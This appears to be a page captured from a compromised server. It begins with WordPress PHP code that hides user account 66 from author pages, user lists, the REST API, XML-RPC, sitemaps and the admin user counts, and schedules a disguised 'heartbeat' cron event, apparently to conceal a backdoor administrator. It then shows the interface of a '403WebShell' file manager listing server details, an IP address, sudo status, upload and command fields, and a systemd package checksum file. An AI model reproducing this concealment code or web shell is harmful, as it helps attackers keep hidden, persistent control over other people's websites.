add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/systemd-dev.md5sums
087eb47cb3865d8a1084cf629a97e3f5  usr/share/dbus-1/interfaces/org.freedesktop.LogControl1.xml
f1e747336a0b0d53da9857c60f440903  usr/share/dbus-1/interfaces/org.freedesktop.home1.Home.xml
740c31d375d41c10f64cf4ced0fb82bf  usr/share/dbus-1/interfaces/org.freedesktop.home1.Manager.xml
08786ac43b34bbe8123f24858f91f949  usr/share/dbus-1/interfaces/org.freedesktop.hostname1.xml
117ce1962ab6602e3df24e368ea04ef4  usr/share/dbus-1/interfaces/org.freedesktop.import1.Manager.xml
5328f77b4ae346da2314a65c8f886fea  usr/share/dbus-1/interfaces/org.freedesktop.import1.Transfer.xml
e4787a122d0cf2106aa0eb7d2e08331c  usr/share/dbus-1/interfaces/org.freedesktop.locale1.xml
5fd4ffcc82d6ecaeecd36badedfbd896  usr/share/dbus-1/interfaces/org.freedesktop.login1.Manager.xml
85a9f713c958c2a36cb3bc85503213a1  usr/share/dbus-1/interfaces/org.freedesktop.login1.Seat.xml
b90d476cd47a2305f0762a9f08ea5702  usr/share/dbus-1/interfaces/org.freedesktop.login1.Session.xml
447b131beb0cb1f7f7474634c59c2b47  usr/share/dbus-1/interfaces/org.freedesktop.login1.User.xml
0989ee247eaa1057f6aa8574f2a95947  usr/share/dbus-1/interfaces/org.freedesktop.machine1.Image.xml
634a26aa220492ed9aa564f4c37225bc  usr/share/dbus-1/interfaces/org.freedesktop.machine1.Machine.xml
88384039e5bfeb173b3bd853ea2675f1  usr/share/dbus-1/interfaces/org.freedesktop.machine1.Manager.xml
9f43307820c9e5c1d7b521be034209b3  usr/share/dbus-1/interfaces/org.freedesktop.network1.DHCPServer.xml
adc690a21293425d67ed3d5e147dc0ff  usr/share/dbus-1/interfaces/org.freedesktop.network1.DHCPv4Client.xml
2c4b9296665cb486fb0aaa6c84fd71d6  usr/share/dbus-1/interfaces/org.freedesktop.network1.DHCPv6Client.xml
cc6d6241132623930a1078c98d099f03  usr/share/dbus-1/interfaces/org.freedesktop.network1.Link.xml
426d8236689416277ae0fe8d6219fe80  usr/share/dbus-1/interfaces/org.freedesktop.network1.Manager.xml
46e565bcde9687eabd62012071d087cf  usr/share/dbus-1/interfaces/org.freedesktop.network1.Network.xml
9ce8693a5c17867509a9ce86ff50d429  usr/share/dbus-1/interfaces/org.freedesktop.oom1.Manager.xml
2a0c98fe66fe40f520b8fd7dede06653  usr/share/dbus-1/interfaces/org.freedesktop.portable1.Image.xml
b9aa7558d97006ffb977fd3d060a2fdd  usr/share/dbus-1/interfaces/org.freedesktop.portable1.Manager.xml
22b2666c8ee3311ec16aa7434dacc908  usr/share/dbus-1/interfaces/org.freedesktop.resolve1.DnssdService.xml
9293bda119c254a0e17b8518608ab59e  usr/share/dbus-1/interfaces/org.freedesktop.resolve1.Link.xml
158f35b96b84a2ee3d235961dac0671f  usr/share/dbus-1/interfaces/org.freedesktop.resolve1.Manager.xml
736fce0d77c678039b688943be57e72d  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Automount.xml
32515b58f3056c4a4ee2d16823023164  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Device.xml
4cc2efa66c36ce898de5108e3ea9cc69  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Job.xml
6fe58c4f07c1617b0055f5806569dfdb  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Manager.xml
d397a49bab34dde066c72161ac922a9e  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Mount.xml
d4d124f8e1c47013bc6f2061a69521cf  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Path.xml
0b645a314339f958d4be6a6bcbfe5483  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Scope.xml
eef9e1b0b9049da8471b14323bf3d624  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Service.xml
55df41e88fb7202122244ecfcf888b38  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Slice.xml
6a3f2c74b018ad71b6feabecd43c2a83  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Socket.xml
e8085c8b0e6ed9db741b8418ba4f764c  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Swap.xml
f03b04278044444414ca6abb7c59cbb7  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Target.xml
19a50c271496ef8fc781d5dc1245c758  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Timer.xml
a8c555e2a4b6a6e58b520780a254b2f0  usr/share/dbus-1/interfaces/org.freedesktop.systemd1.Unit.xml
0c9ed98947e9afe88e53b941f4a0c161  usr/share/dbus-1/interfaces/org.freedesktop.timedate1.xml
9a64698004dde7cc4a0294003225c780  usr/share/doc/systemd-dev/NEWS.Debian.gz
ec1a2f0cc308f5c4eea511b07a66142e  usr/share/doc/systemd-dev/changelog.Debian.gz
b16a86fb841b001b52a5c5caccf526c2  usr/share/doc/systemd-dev/copyright
417e2f3f23fd12713852e262dabd0fc9  usr/share/pkgconfig/systemd.pc
b8bfa8a919f47b755f9ae60ef70e32fe  usr/share/pkgconfig/udev.pc

Youez - 2016 - github.com/yon3zu
LinuXploit